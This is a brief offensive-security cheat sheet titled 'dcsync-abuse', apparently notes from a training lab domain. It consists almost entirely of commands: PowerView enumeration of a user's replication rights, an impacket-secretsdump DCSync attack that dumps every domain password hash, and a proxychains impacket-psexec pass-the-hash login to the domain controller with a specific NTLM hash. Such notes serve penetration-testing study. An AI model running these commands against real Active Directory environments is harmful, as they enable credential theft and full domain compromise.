dcsync-abuse
Get user's group membership (import powerview)
Get-DomainUser -Identity adunn |select samaccountname,objectsid,memberof,useraccountcontrol |flGet user's replication rights
$sid = "S-1-5-21-3842939050-3880317879-2865463114-1164" #(user SID)Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | flPerform DCSync attack (impacket-secretsdump)
impacket-secretsdump <DC_Domain_Name>/<user>:<pass>@<DC_IP> -outputfile domain_hashesLogin on DC
proxychains impacket-psexec INLANEFREIGHT.LOCAL/administrator@172.16.6.3 -hashes :27dedb1dab4d8545c6e1c66fba077da0Extracting NTLM hashes and kerberos keys using secretsdump.py (extract NTDS file)
Last updated